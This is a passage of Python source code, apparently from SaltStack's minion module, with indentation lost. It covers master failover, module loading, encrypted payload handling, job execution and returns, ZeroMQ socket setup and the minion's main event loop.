' masters'.format(opts['master']))
# create new list of master with the possibly failed one removed
opts['master'] = [x for x in opts['master_list'] if opts['master'] != x]
else:
msg = ('master_type set to \'failover\' but \'master\' '
'is not of type list but of type '
'{0}'.format(type(opts['master'])))
log.error(msg)
sys.exit(salt.defaults.exitcodes.EX_GENERIC)
else:
msg = ('Invalid keyword \'{0}\' for variable '
'\'master_type\''.format(opts['master_type']))
log.error(msg)
sys.exit(salt.defaults.exitcodes.EX_GENERIC)
# if we have a list of masters, loop through them and be
# happy with the first one that allows us to connect
if isinstance(opts['master'], list):
conn = False
# shuffle the masters and then loop through them
local_masters = copy.copy(opts['master'])
for master in local_masters:
opts['master'] = master
opts.update(resolve_dns(opts))
super(Minion, self).__init__(opts)
# on first run, update self.opts with the whole master list
# to enable a minion to re-use old masters if they get fixed
if 'master_list' not in self.opts:
self.opts['master_list'] = local_masters
try:
if self.authenticate(timeout, safe) != 'full':
conn = True
break
except SaltClientError:
msg = ('Master {0} could not be reached, trying '
'next master (if any)'.format(opts['master']))
log.info(msg)
continue
if not conn:
self.connected = False
msg = ('No master could be reached or all masters denied '
'the minions connection attempt.')
log.error(msg)
else:
self.connected = True
return opts['master']
# single master sign in
else:
opts.update(resolve_dns(opts))
super(Minion, self).__init__(opts)
if self.authenticate(timeout, safe) == 'full':
self.connected = False
msg = ('master {0} rejected the minions connection because too '
'many minions are already connected.'.format(opts['master']))
log.error(msg)
sys.exit(salt.defaults.exitcodes.EX_GENERIC)
else:
self.connected = True
return opts['master']
def _prep_mod_opts(self):
'''
Returns a copy of the opts with key bits stripped out
'''
mod_opts = {}
for key, val in six.iteritems(self.opts):
if key == 'logger':
continue
mod_opts[key] = val
return mod_opts
def _process_beacons(self):
'''
Process each beacon and send events if appropriate
'''
# Process Beacons
try:
beacons = self.process_beacons(self.functions)
except Exception as exc:
log.critical('Beacon processing errored: {0}. No beacons will be procssed.'.format(traceback.format_exc(exc)))
beacons = None
if beacons:
self._fire_master(events=beacons)
for beacon in beacons:
serialized_data = salt.utils.dicttrim.trim_dict(
self.serial.dumps(beacon['data']),
self.opts.get('max_event_size', 1048576),
is_msgpacked=True,
)
log.debug('Sending event - data = {0}'.format(beacon['data']))
event = '{0}{1}{2}'.format(
beacon['tag'],
salt.utils.event.TAGEND,
serialized_data)
self.handle_event(event)
self.epub_sock.send(event)
def _load_modules(self, force_refresh=False, notify=False):
'''
Return the functions and the returners loaded up from the loader
module
'''
# if this is a *nix system AND modules_max_memory is set, lets enforce
# a memory limit on module imports
# this feature ONLY works on *nix like OSs (resource module doesn't work on windows)
modules_max_memory = False
if self.opts.get('modules_max_memory', -1) > 0 and HAS_PSUTIL and HAS_RESOURCE:
log.debug('modules_max_memory set, enforcing a maximum of {0}'.format(self.opts['modules_max_memory']))
modules_max_memory = True
old_mem_limit = resource.getrlimit(resource.RLIMIT_AS)
rss, vms = psutil.Process(os.getpid()).get_memory_info()
mem_limit = rss + vms + self.opts['modules_max_memory']
resource.setrlimit(resource.RLIMIT_AS, (mem_limit, mem_limit))
elif self.opts.get('modules_max_memory', -1) > 0:
if not HAS_PSUTIL:
log.error('Unable to enforce modules_max_memory because psutil is missing')
if not HAS_RESOURCE:
log.error('Unable to enforce modules_max_memory because resource is missing')
self.opts['grains'] = salt.loader.grains(self.opts, force_refresh)
self.utils = salt.loader.utils(self.opts)
if self.opts.get('multimaster', False):
s_opts = copy.deepcopy(self.opts)
functions = salt.loader.minion_mods(s_opts, utils=self.utils,
loaded_base_name=self.loaded_base_name, notify=notify)
else:
functions = salt.loader.minion_mods(self.opts, utils=self.utils, notify=notify)
returners = salt.loader.returners(self.opts, functions)
errors = {}
if '_errors' in functions:
errors = functions['_errors']
functions.pop('_errors')
functions.clear()
returners.clear()
# we're done, reset the limits!
if modules_max_memory is True:
resource.setrlimit(resource.RLIMIT_AS, old_mem_limit)
return functions, returners, errors
def _fire_master(self, data=None, tag=None, events=None, pretag=None, timeout=60):
'''
Fire an event on the master, or drop message if unable to send.
'''
load = {'id': self.opts['id'],
'cmd': '_minion_event',
'pretag': pretag,
'tok': self.tok}
if events:
load['events'] = events
elif data and tag:
load['data'] = data
load['tag'] = tag
elif not data and tag:
load['data'] = {}
load['tag'] = tag
else:
return
channel = salt.transport.Channel.factory(self.opts)
try:
result = channel.send(load, timeout=timeout)
return True
except Exception:
log.info('fire_master failed: {0}'.format(traceback.format_exc()))
return False
def _handle_payload(self, payload):
'''
Takes a payload from the master publisher and does whatever the
master wants done.
'''
{'aes': self._handle_aes,
'pub': self._handle_pub,
'clear': self._handle_clear}[payload['enc']](payload['load'],
payload['sig'] if 'sig' in payload else None)
def _handle_aes(self, load, sig=None):
'''
Takes the AES encrypted load, checks the signature if pub signatures
are turned on, decrypts it, and runs the encapsulated instructions
'''
# Verify that the signature is valid
master_pubkey_path = os.path.join(self.opts['pki_dir'], 'minion_master.pub')
if sig and self.functions['config.get']('sign_pub_messages'):
if not salt.crypt.verify_signature(master_pubkey_path, load, sig):
raise AuthenticationError('Message signature failed to validate.')
try:
data = self.crypticle.loads(load)
except AuthenticationError:
# decryption of the payload failed, try to re-auth
self.authenticate()
data = self.crypticle.loads(load)
# Verify that the publication is valid
if 'tgt' not in data or 'jid' not in data or 'fun' not in data \
or 'arg' not in data:
return
# Verify that the publication applies to this minion
# It's important to note that the master does some pre-processing
# to determine which minions to send a request to. So for example,
# a "salt -G 'grain_key:grain_val' test.ping" will invoke some
# pre-processing on the master and this minion should not see the
# publication if the master does not determine that it should.
if 'tgt_type' in data:
match_func = getattr(self.matcher,
'{0}_match'.format(data['tgt_type']), None)
if match_func is None:
return
if data['tgt_type'] in ('grain', 'grain_pcre', 'pillar'):
delimiter = data.get('delimiter', DEFAULT_TARGET_DELIM)
if not match_func(data['tgt'], delimiter=delimiter):
return
elif not match_func(data['tgt']):
return
else:
if not self.matcher.glob_match(data['tgt']):
return
# If the minion does not have the function, don't execute,
# this prevents minions that could not load a minion module
# from returning a predictable exception
#if data['fun'] not in self.functions:
# return
if 'user' in data:
log.info(
'User {0[user]} Executing command {0[fun]} with jid ' # pylint: disable=W1307
'{0[jid]}'.format(data)
)
else:
log.info(
'Executing command {0[fun]} with jid {0[jid]}'.format(data) # pylint: disable=W1307
)
log.debug('Command details {0}'.format(data))
self._handle_decoded_payload(data)
def _handle_pub(self, load):
'''
Handle public key payloads
'''
pass
def _handle_clear(self, load, sig=None):
'''
Handle un-encrypted transmissions
'''
pass
def _handle_decoded_payload(self, data):
'''
Override this method if you wish to handle the decoded data
differently.
'''
if isinstance(data['fun'], six.string_types):
if data['fun'] == 'sys.reload_modules':
self.functions, self.returners, self.function_errors = self._load_modules()
self.schedule.functions = self.functions
self.schedule.returners = self.returners
if isinstance(data['fun'], tuple) or isinstance(data['fun'], list):
target = Minion._thread_multi_return
else:
target = Minion._thread_return
# We stash an instance references to allow for the socket
# communication in Windows. You can't pickle functions, and thus
# python needs to be able to reconstruct the reference on the other
# side.
instance = self
if self.opts['multiprocessing']:
if sys.platform.startswith('win'):
# let python reconstruct the minion on the other side if we're
# running on windows
instance = None
process = multiprocessing.Process(
target=target, args=(instance, self.opts, data)
)
else:
process = threading.Thread(
target=target,
args=(instance, self.opts, data),
name=data['jid']
)
process.start()
if not sys.platform.startswith('win'):
process.join()
else:
self.win_proc.append(process)
@classmethod
def _thread_return(cls, minion_instance, opts, data):
'''
This method should be used as a threading target, start the actual
minion side execution.
'''
# this seems awkward at first, but it's a workaround for Windows
# multiprocessing communication.
if not minion_instance:
minion_instance = cls(opts)
fn_ = os.path.join(minion_instance.proc_dir, data['jid'])
if opts['multiprocessing']:
salt.utils.daemonize_if(opts)
salt.utils.appendproctitle(data['jid'])
sdata = {'pid': os.getpid()}
sdata.update(data)
log.info('Starting a new job with PID {0}'.format(sdata['pid']))
with salt.utils.fopen(fn_, 'w+b') as fp_:
fp_.write(minion_instance.serial.dumps(sdata))
ret = {'success': False}
function_name = data['fun']
if function_name in minion_instance.functions:
try:
func = minion_instance.functions[data['fun']]
args, kwargs = load_args_and_kwargs(
func,
data['arg'],
data)
minion_instance.functions.pack['__context__']['retcode'] = 0
if opts.get('sudo_user', ''):
sudo_runas = opts.get('sudo_user')
if 'sudo.salt_call' in minion_instance.functions:
return_data = minion_instance.functions['sudo.salt_call'](
sudo_runas,
data['fun'],
*args,
**kwargs)
else:
return_data = func(*args, **kwargs)
if isinstance(return_data, types.GeneratorType):
ind = 0
iret = {}
for single in return_data:
if isinstance(single, dict) and isinstance(iret, dict):
iret.update(single)
else:
if not iret:
iret = []
iret.append(single)
tag = tagify([data['jid'], 'prog', opts['id'], str(ind)], 'job')
event_data = {'return': single}
minion_instance._fire_master(event_data, tag)
ind += 1
ret['return'] = iret
else:
ret['return'] = return_data
ret['retcode'] = minion_instance.functions.pack['__context__'].get(
'retcode',
0
)
ret['success'] = True
except CommandNotFoundError as exc:
msg = 'Command required for {0!r} not found'.format(
function_name
)
log.debug(msg, exc_info=True)
ret['return'] = '{0}: {1}'.format(msg, exc)
ret['out'] = 'nested'
except CommandExecutionError as exc:
log.error(
'A command in {0!r} had a problem: {1}'.format(
function_name,
exc
),
exc_info_on_loglevel=logging.DEBUG
)
ret['return'] = 'ERROR: {0}'.format(exc)
ret['out'] = 'nested'
except SaltInvocationError as exc:
log.error(
'Problem executing {0!r}: {1}'.format(
function_name,
exc
),
exc_info_on_loglevel=logging.DEBUG
)
ret['return'] = 'ERROR executing {0!r}: {1}'.format(
function_name, exc
)
ret['out'] = 'nested'
except TypeError as exc:
msg = 'Passed invalid arguments: {0}\n{1}'.format(exc, func.__doc__)
log.warning(msg, exc_info_on_loglevel=logging.DEBUG)
ret['return'] = msg
ret['out'] = 'nested'
except Exception:
msg = 'The minion function caused an exception'
log.warning(msg, exc_info_on_loglevel=logging.DEBUG)
salt.utils.error.fire_exception(salt.exceptions.MinionError(msg), opts, job=data)
ret['return'] = '{0}: {1}'.format(msg, traceback.format_exc())
ret['out'] = 'nested'
else:
ret['return'] = minion_instance.functions.missing_fun_string(function_name)
mod_name = function_name.split('.')[0]
if mod_name in minion_instance.function_errors:
ret['return'] += ' Possible reasons: {0!r}'.format(minion_instance.function_errors[mod_name])
ret['success'] = False
ret['retcode'] = 254
ret['out'] = 'nested'
ret['jid'] = data['jid']
ret['fun'] = data['fun']
ret['fun_args'] = data['arg']
if 'master_id' in data:
ret['master_id'] = data['master_id']
if 'metadata' in data:
if isinstance(data['metadata'], dict):
ret['metadata'] = data['metadata']
else:
log.warning('The metadata parameter must be a dictionary. Ignoring.')
minion_instance._return_pub(ret)
if data['ret']:
if 'ret_config' in data:
ret['ret_config'] = data['ret_config']
ret['id'] = opts['id']
for returner in set(data['ret'].split(',')):
try:
minion_instance.returners['{0}.returner'.format(
returner
)](ret)
except Exception as exc:
log.error(
'The return failed for job {0} {1}'.format(
data['jid'],
exc
)
)
log.error(traceback.format_exc())
@classmethod
def _thread_multi_return(cls, minion_instance, opts, data):
'''
This method should be used as a threading target, start the actual
minion side execution.
'''
salt.utils.appendproctitle(data['jid'])
# this seems awkward at first, but it's a workaround for Windows
# multiprocessing communication.
if not minion_instance:
minion_instance = cls(opts)
ret = {
'return': {},
'success': {},
}
for ind in range(0, len(data['fun'])):
ret['success'][data['fun'][ind]] = False
try:
func = minion_instance.functions[data['fun'][ind]]
args, kwargs = load_args_and_kwargs(
func,
data['arg'][ind],
data)
ret['return'][data['fun'][ind]] = func(*args, **kwargs)
ret['success'][data['fun'][ind]] = True
except Exception as exc:
trb = traceback.format_exc()
log.warning(
'The minion function caused an exception: {0}'.format(
exc
)
)
ret['return'][data['fun'][ind]] = trb
ret['jid'] = data['jid']
ret['fun'] = data['fun']
ret['fun_args'] = data['arg']
if 'metadata' in data:
ret['metadata'] = data['metadata']
minion_instance._return_pub(ret)
if data['ret']:
if 'ret_config' in data:
ret['ret_config'] = data['ret_config']
for returner in set(data['ret'].split(',')):
ret['id'] = opts['id']
try:
minion_instance.returners['{0}.returner'.format(
returner
)](ret)
except Exception as exc:
log.error(
'The return failed for job {0} {1}'.format(
data['jid'],
exc
)
)
def _return_pub(self, ret, ret_cmd='_return', timeout=60):
'''
Return the data from the executed command to the master server
'''
jid = ret.get('jid', ret.get('__jid__'))
fun = ret.get('fun', ret.get('__fun__'))
if self.opts['multiprocessing']:
fn_ = os.path.join(self.proc_dir, jid)
if os.path.isfile(fn_):
try:
os.remove(fn_)
except (OSError, IOError):
# The file is gone already
pass
log.info('Returning information for job: {0}'.format(jid))
channel = salt.transport.Channel.factory(self.opts)
if ret_cmd == '_syndic_return':
load = {'cmd': ret_cmd,
'id': self.opts['id'],
'jid': jid,
'fun': fun,
'arg': ret.get('arg'),
'tgt': ret.get('tgt'),
'tgt_type': ret.get('tgt_type'),
'load': ret.get('__load__')}
if '__master_id__' in ret:
load['master_id'] = ret['__master_id__']
load['return'] = {}
for key, value in six.iteritems(ret):
if key.startswith('__'):
continue
load['return'][key] = value
else:
load = {'cmd': ret_cmd,
'id': self.opts['id']}
for key, value in six.iteritems(ret):
load[key] = value
if 'out' in ret:
if isinstance(ret['out'], six.string_types):
load['out'] = ret['out']
else:
log.error('Invalid outputter {0}. This is likely a bug.'
.format(ret['out']))
else:
try:
oput = self.functions[fun].__outputter__
except (KeyError, AttributeError, TypeError):
pass
else:
if isinstance(oput, six.string_types):
load['out'] = oput
if self.opts['cache_jobs']:
# Local job cache has been enabled
fn_ = os.path.join(
self.opts['cachedir'],
'minion_jobs',
load['jid'],
'return.p')
jdir = os.path.dirname(fn_)
if not os.path.isdir(jdir):
os.makedirs(jdir)
salt.utils.fopen(fn_, 'w+b').write(self.serial.dumps(ret))
try:
ret_val = channel.send(load, timeout=timeout)
except SaltReqTimeoutError:
msg = ('The minion failed to return the job information for job '
'{0}. This is often due to the master being shut down or '
'overloaded. If the master is running consider increasing '
'the worker_threads value.').format(jid)
log.warn(msg)
return ''
log.trace('ret_val = {0}'.format(ret_val))
return ret_val
def _state_run(self):
'''
Execute a state run based on information set in the minion config file
'''
if self.opts['startup_states']:
data = {'jid': 'req', 'ret': self.opts.get('ext_job_cache', '')}
if self.opts['startup_states'] == 'sls':
data['fun'] = 'state.sls'
data['arg'] = [self.opts['sls_list']]
elif self.opts['startup_states'] == 'top':
data['fun'] = 'state.top'
data['arg'] = [self.opts['top_file']]
else:
data['fun'] = 'state.highstate'
data['arg'] = []
self._handle_decoded_payload(data)
def _refresh_grains_watcher(self, refresh_interval_in_minutes):
'''
Create a loop that will fire a pillar refresh to inform a master about a change in the grains of this minion
:param refresh_interval_in_minutes:
:return: None
'''
if '__update_grains' not in self.opts.get('schedule', {}):
if 'schedule' not in self.opts:
self.opts['schedule'] = {}
self.opts['schedule'].update({
'__update_grains':
{
'function': 'event.fire',
'args': [{}, 'grains_refresh'],
'minutes': refresh_interval_in_minutes
}
})
def _set_tcp_keepalive(self):
if hasattr(zmq, 'TCP_KEEPALIVE'):
self.socket.setsockopt(
zmq.TCP_KEEPALIVE, self.opts['tcp_keepalive']
)
self.socket.setsockopt(
zmq.TCP_KEEPALIVE_IDLE, self.opts['tcp_keepalive_idle']
)
self.socket.setsockopt(
zmq.TCP_KEEPALIVE_CNT, self.opts['tcp_keepalive_cnt']
)
self.socket.setsockopt(
zmq.TCP_KEEPALIVE_INTVL, self.opts['tcp_keepalive_intvl']
)
def _set_monitor_socket(self):
if not HAS_ZMQ_MONITOR or not self.opts['zmq_monitor']:
return
self.monitor_socket = self.socket.get_monitor_socket()
t = threading.Thread(target=self._socket_monitor, args=(self.monitor_socket,))
t.start()
def _socket_monitor(self, monitor):
event_map = {}
for name in dir(zmq):
if name.startswith('EVENT_'):
value = getattr(zmq, name)
event_map[value] = name
while monitor.poll():
evt = zmq.utils.monitor.recv_monitor_message(monitor)
evt.update({'description': event_map[evt['event']]})
log.debug("ZeroMQ event: {0}".format(evt))
if evt['event'] == zmq.EVENT_MONITOR_STOPPED:
break
monitor.close()
log.trace("event monitor thread done!")
def _set_reconnect_ivl(self):
recon_delay = self.opts['recon_default']
if self.opts['recon_randomize']:
recon_delay = randint(self.opts['recon_default'],
self.opts['recon_default'] + self.opts['recon_max']
)
log.debug("Generated random reconnect delay between '{0}ms' and '{1}ms' ({2})".format(
self.opts['recon_default'],
self.opts['recon_default'] + self.opts['recon_max'],
recon_delay)
)
log.debug("Setting zmq_reconnect_ivl to '{0}ms'".format(recon_delay))
self.socket.setsockopt(zmq.RECONNECT_IVL, recon_delay)
def _set_reconnect_ivl_max(self):
if hasattr(zmq, 'RECONNECT_IVL_MAX'):
log.debug("Setting zmq_reconnect_ivl_max to '{0}ms'".format(
self.opts['recon_default'] + self.opts['recon_max'])
)
self.socket.setsockopt(
zmq.RECONNECT_IVL_MAX, self.opts['recon_max']
)
def _set_ipv4only(self):
if self.opts['ipv6'] is True and hasattr(zmq, 'IPV4ONLY'):
# IPv6 sockets work for both IPv6 and IPv4 addresses
self.socket.setsockopt(zmq.IPV4ONLY, 0)
def _fire_master_minion_start(self):
# Send an event to the master that the minion is live
self._fire_master(
'Minion {0} started at {1}'.format(
self.opts['id'],
time.asctime()
),
'minion_start'
)
# dup name spaced event
self._fire_master(
'Minion {0} started at {1}'.format(
self.opts['id'],
time.asctime()
),
tagify([self.opts['id'], 'start'], 'minion'),
)
def _setsockopts(self):
if self.opts['zmq_filtering']:
# TODO: constants file for "broadcast"
self.socket.setsockopt(zmq.SUBSCRIBE, 'broadcast')
self.socket.setsockopt(zmq.SUBSCRIBE, self.hexid)
else:
self.socket.setsockopt(zmq.SUBSCRIBE, '')
self.socket.setsockopt(zmq.IDENTITY, self.opts['id'])
self._set_ipv4only()
self._set_reconnect_ivl_max()
self._set_tcp_keepalive()
@property
def master_pub(self):
'''
Return the master publish port
'''
return 'tcp://{ip}:{port}'.format(ip=self.opts['master_ip'],
port=self.publish_port)
def authenticate(self, timeout=60, safe=True):
'''
Authenticate with the master, this method breaks the functional
paradigm, it will update the master information from a fresh sign
in, signing in can occur as often as needed to keep up with the
revolving master AES key.
'''
log.debug(
'Attempting to authenticate with the Salt Master at {0}'.format(
self.opts['master_ip']
)
)
auth = salt.crypt.SAuth(self.opts)
auth.authenticate(timeout=timeout, safe=safe)
# TODO: remove these and just use a local reference to auth??
self.tok = auth.gen_token('salt')
self.crypticle = auth.crypticle
if self.opts.get('syndic_master_publish_port'):
self.publish_port = self.opts.get('syndic_master_publish_port')
else:
self.publish_port = auth.creds['publish_port']
def module_refresh(self, force_refresh=False, notify=False):
'''
Refresh the functions and returners.
'''
log.debug('Refreshing modules. Notify={0}'.format(notify))
self.functions, self.returners, _ = self._load_modules(force_refresh, notify=notify)
self.schedule.functions = self.functions
self.schedule.returners = self.returners
def pillar_refresh(self, force_refresh=False):
'''
Refresh the pillar
'''
log.debug('Refreshing pillar')
try:
self.opts['pillar'] = salt.pillar.get_pillar(
self.opts,
self.opts['grains'],
self.opts['id'],
self.opts['environment'],
).compile_pillar()
except SaltClientError:
# Do not exit if a pillar refresh fails.
log.error('Pillar data could not be refreshed. '
'One or more masters may be down!')
self.module_refresh(force_refresh)
def manage_schedule(self, package):
'''
Refresh the functions and returners.
'''
tag, data = salt.utils.event.MinionEvent.unpack(package)
func = data.get('func', None)
name = data.get('name', None)
schedule = data.get('schedule', None)
where = data.get('where', None)
if func == 'delete':
self.schedule.delete_job(name)
elif func == 'add':
self.schedule.add_job(schedule)
elif func == 'modify':
self.schedule.modify_job(name, schedule, where)
elif func == 'enable':
self.schedule.enable_schedule()
elif func == 'disable':
self.schedule.disable_schedule()
elif func == 'enable_job':
self.schedule.enable_job(name, where)
elif func == 'run_job':
self.schedule.run_job(name, where)
elif func == 'disable_job':
self.schedule.disable_job(name, where)
elif func == 'reload':
self.schedule.reload(schedule)
def environ_setenv(self, package):
'''
Set the salt-minion main process environment according to
the data contained in the minion event data
'''
tag, data = salt.utils.event.MinionEvent.unpack(package)
environ = data.get('environ', None)
if environ is None:
return False
false_unsets = data.get('false_unsets', False)
clear_all = data.get('clear_all', False)
import salt.modules.environ as mod_environ
return mod_environ.setenv(environ, false_unsets, clear_all)
def clean_die(self, signum, frame):
'''
Python does not handle the SIGTERM cleanly, if it is signaled exit
the minion process cleanly
'''
self._running = False
exit(0)
def _pre_tune(self):
'''
Set the minion running flag and issue the appropriate warnings if
the minion cannot be started or is already running
'''
if self._running is None:
self._running = True
elif self._running is False:
log.error(
'This {0} was scheduled to stop. Not running '
'{0}.tune_in()'.format(self.__class__.__name__)
)
return
elif self._running is True:
log.error(
'This {0} is already running. Not running '
'{0}.tune_in()'.format(self.__class__.__name__)
)
return
try:
log.info(
'{0} is starting as user \'{1}\''.format(
self.__class__.__name__,
salt.utils.get_user()
)
)
except Exception as err:
# Only windows is allowed to fail here. See #3189. Log as debug in
# that case. Else, error.
log.log(
salt.utils.is_windows() and logging.DEBUG or logging.ERROR,
'Failed to get the user who is starting {0}'.format(
self.__class__.__name__
),
exc_info=err
)
def _mine_send(self, package):
'''
Send mine data to the master
'''
channel = salt.transport.Channel.factory(self.opts)
load = salt.utils.event.SaltEvent.unpack(package)[1]
load['tok'] = self.tok
ret = channel.send(load)
return ret
def handle_event(self, package):
'''
Handle an event from the epull_sock (all local minion events)
'''
log.debug('Handling event {0!r}'.format(package))
if package.startswith('module_refresh'):
tag, data = salt.utils.event.MinionEvent.unpack(package)
self.module_refresh(notify=data.get('notify', False))
elif package.startswith('pillar_refresh'):
self.pillar_refresh()
elif package.startswith('manage_schedule'):
self.manage_schedule(package)
elif package.startswith('grains_refresh'):
if self.grains_cache != self.opts['grains']:
self.pillar_refresh(force_refresh=True)
self.grains_cache = self.opts['grains']
elif package.startswith('environ_setenv'):
self.environ_setenv(package)
elif package.startswith('_minion_mine'):
self._mine_send(package)
elif package.startswith('fire_master'):
tag, data = salt.utils.event.MinionEvent.unpack(package)
log.debug('Forwarding master event tag={tag}'.format(tag=data['tag']))
self._fire_master(data['data'], data['tag'], data['events'], data['pretag'])
elif package.startswith('__master_disconnected'):
tag, data = salt.utils.event.MinionEvent.unpack(package)
# if the master disconnect event is for a different master, raise an exception
if data['master'] != self.opts['master']:
raise Exception()
if self.connected:
# we are not connected anymore
self.connected = False
# modify the scheduled job to fire only on reconnect
schedule = {
'function': 'status.master',
'seconds': self.opts['master_alive_interval'],
'jid_include': True,
'maxrunning': 2,
'kwargs': {'master': self.opts['master'],
'connected': False}
}
self.schedule.modify_job(name='__master_alive',
schedule=schedule)
log.info('Connection to master {0} lost'.format(self.opts['master']))
if self.opts['master_type'] == 'failover':
log.info('Trying to tune in to next master from master-list')
# if eval_master finds a new master for us, self.connected
# will be True again on successfull master authentication
self.opts['master'] = self.eval_master(opts=self.opts,
failed=True)
if self.connected:
# re-init the subsystems to work with the new master
log.info('Re-initialising subsystems for new '
'master {0}'.format(self.opts['master']))
del self.socket
del self.context
del self.poller
self._init_context_and_poller()
self.socket = self.context.socket(zmq.SUB)
self._set_reconnect_ivl()
self._setsockopts()
self.socket.connect(self.master_pub)
self.poller.register(self.socket, zmq.POLLIN)
self.poller.register(self.epull_sock, zmq.POLLIN)
self._fire_master_minion_start()
log.info('Minion is ready to receive requests!')
# update scheduled job to run with the new master addr
schedule = {
'function': 'status.master',
'seconds': self.opts['master_alive_interval'],
'jid_include': True,
'maxrunning': 2,
'kwargs': {'master': self.opts['master'],
'connected': True}
}
self.schedule.modify_job(name='__master_alive',
schedule=schedule)
elif package.startswith('__master_connected'):
# handle this event only once. otherwise it will pollute the log
if not self.connected:
log.info('Connection to master {0} re-established'.format(self.opts['master']))
self.connected = True
# modify the __master_alive job to only fire,
# if the connection is lost again
schedule = {
'function': 'status.master',
'seconds': self.opts['master_alive_interval'],
'jid_include': True,
'maxrunning': 2,
'kwargs': {'master': self.opts['master'],
'connected': True}
}
self.schedule.modify_job(name='__master_alive',
schedule=schedule)
elif package.startswith('_salt_error'):
tag, data = salt.utils.event.MinionEvent.unpack(package)
log.debug('Forwarding salt error event tag={tag}'.format(tag=tag))
self._fire_master(data, tag)
def _windows_thread_cleanup(self):
'''
Cleanup Windows threads
'''
if not salt.utils.is_windows():
return
for thread in self.win_proc:
if not thread.is_alive():
thread.join()
try:
self.win_proc.remove(thread)
del thread
except (ValueError, NameError):
pass
# Main Minion Tune In
def tune_in(self):
'''
Lock onto the publisher. This is the main event loop for the minion
:rtype : None
'''
self._pre_tune()
# Properly exit if a SIGTERM is signalled
signal.signal(signal.SIGTERM, self.clean_die)
log.debug('Minion {0!r} trying to tune in'.format(self.opts['id']))
self._prepare_minion_event_system()
self.socket = self.context.socket(zmq.SUB)
self._set_reconnect_ivl()
self._setsockopts()
self._set_monitor_socket()
self.socket.connect(self.master_pub)
self.poller.register(self.socket, zmq.POLLIN)
self.poller.register(self.epull_sock, zmq.POLLIN)
self._fire_master_minion_start()
log.info('Minion is ready to receive requests!')
# Make sure to gracefully handle SIGUSR1
enable_sigusr1_handler()
# Make sure to gracefully handle CTRL_LOGOFF_EVENT
salt.utils.enable_ctrl_logoff_handler()
# On first startup execute a state run if configured to do so
self._state_run()
loop_interval = int(self.opts['loop_interval'])
try:
if self.opts['grains_refresh_every']: # If exists and is not zero. In minutes, not seconds!
if self.opts['grains_refresh_every'] > 1:
log.debug(
'Enabling the grains refresher. Will run every {0} minutes.'.format(
self.opts['grains_refresh_every'])
)
else: # Clean up minute vs. minutes in log message
log.debug(
'Enabling the grains refresher. Will run every {0} minute.'.format(
self.opts['grains_refresh_every'])
)
self._refresh_grains_watcher(
abs(self.opts['grains_refresh_every'])
)
except Exception as exc:
log.error(
'Exception occurred in attempt to initialize grain refresh routine during minion tune-in: {0}'.format(
exc)
)
ping_interval = self.opts.get('ping_interval', 0) * 60
ping_at = None
while self._running is True:
loop_interval = self.process_schedule(self, loop_interval)
self._windows_thread_cleanup()
try:
socks = self._do_poll(loop_interval)
if ping_interval > 0:
if socks or not ping_at:
ping_at = time.time() + ping_interval
if ping_at < time.time():
log.debug('Ping master')
self._fire_master('ping', 'minion_ping')
ping_at = time.time() + ping_interval
self._do_socket_recv(socks)
self._do_event_poll(socks)
self._process_beacons()
except zmq.ZMQError as exc:
# The interrupt caused by python handling the
# SIGCHLD. Throws this error with errno == EINTR.
# Nothing to receive on the zmq socket throws this error
# with EAGAIN.
# Both are safe to ignore
if exc.errno != errno.EAGAIN and exc.errno != errno.EINTR:
log.critical('Unexpected ZMQError while polling minion',
exc_info=True)
continue
except SaltClientError:
raise
except Exception:
log.critical(
'An exception occurred while polling the minion',
exc_info=True
)
def tune_in_no_block(self):
'''
Executes the tune_in sequence but omits extra logging and the
management of the event bus assuming that these are handled outside
the tune_in sequence
'''
self._pre_tune()
self._init_context_and_poller()
self.socket = self.context.socket(zmq.SUB)
self._setsockopts()
self.socket.connect(self.master_pub)
self.poller.register(self.socket, zmq.POLLIN)
self._fire_master_minion_start()
loop_interval = int(self.opts['loop_interval'])
# On first startup execute a state run if configured to do so
self._state_run()
while self._running is True:
try:
socks = self._do_poll(loop_interval)
self._do_socket_recv(socks)
# Check the event system
except zmq.ZMQError:
# If a zeromq error happens recover
yield True
except Exception:
log.critical(
'An exception occurred while polling the minion',
exc_info=True
)
yield True
def _do_poll(self, loop_interval):
log.trace('Check main poller timeout {0}'.format(loop_interval))
return dict(self.poller.poll(
loop_interval * 1000)
)
def _do_event_poll(self, socks):
# Check the event system
if socks.get(self.epull_sock) == zmq.POLLIN:
package = self.epull_sock.recv(zmq.NOBLOCK)
try:
self.handle_event(package)
self.epub_sock.send(package)
except Exception:
log.debug('Exception while handling events', exc_info=True)
# Add an extra fallback in case a forked process leaks through
multiprocessing.active_children()
def _do_socket_recv(self, socks):
if socks.get(self.socket) == zmq.POLLIN:
# topic filtering is done at the zmq level, so we just strip it
messages = self.socket.recv_multipart(zmq.NOBLOCK)
messages_len = len(messages)
# if it was one message, then its old style
if messages_len == 1:
payload = self.serial.loads(messages[0])
# 2 includes a header which says who should do it
elif messages_len == 2:
payload = self.serial.loads(messages[1])
else:
raise Exception(('Invalid number of messages ({0}) in zeromq pub'
'message from master').format(len(messages_len)))
log.trace('Handling payload')
self._handle_payload(payload)
def destroy(self):
'''
Tear down the minion
'''
self._running = False
if getattr(self, 'poller', None) is not None:
if isinstance(self.poller.sockets, dict):
for socket in six.iterkeys(self.poller.sockets):
if socket.closed is False:
socket.close()
self.poller.unregister(socket)
else:
for socket in self.poller.sockets:
if socket[0].closed is False:
socket[0].close()
self.poller.unregister(socket[0])
if hasattr(self, 'epub_sock') and self.epub_sock.closed is False:
self.epub_sock.close()
if hasattr(self, 'epull_sock') and self.epull_sock.closed is False:
self.epull_sock.close()
if hasattr(self, 'socket') and self.socket.closed is False:
self.socket.close()
if hasattr(self, 'context') and self.context.closed is False:
self.context.term()
def __del__(self):
self.destroy()
class Syndic(Minion):
'''
Make a Syndic minion, this minion will use the minion keys on the
master to authenticate with a higher level master.
'''
def __init__(self, opts, **kwargs):
self._syndic_interface = opts.get('interface')
self._syndic = True
# force auth_safemode True because Syndic don't support autorestart
opts['auth_safemode'] = True
opts['loop_interval'] = 1
super(Syndic, self).__init__(opts, **kwargs)
self.mminion = salt.minion.MasterMinion(opts)
self.jid_forward_cache = set()
def _handle_aes(self, load, sig=None):
'''
Takes the AES encrypted load, decrypts it, and runs the encapsulated
instructions
'''
# If the AES authentication has changed, re-authenticate
try:
data = self.crypticle.loads(load)
except AuthenticationError:
self.authenticate()
data = self.crypticle.loads(load)
# Verify that the publication is valid
if 'tgt' not in data or 'jid' not in data or 'fun' not in data \
or 'arg' not in data:
return
data['to'] = int(data.get('to', self.opts['timeout'])) - 1
if 'user' in data:
log.debug(
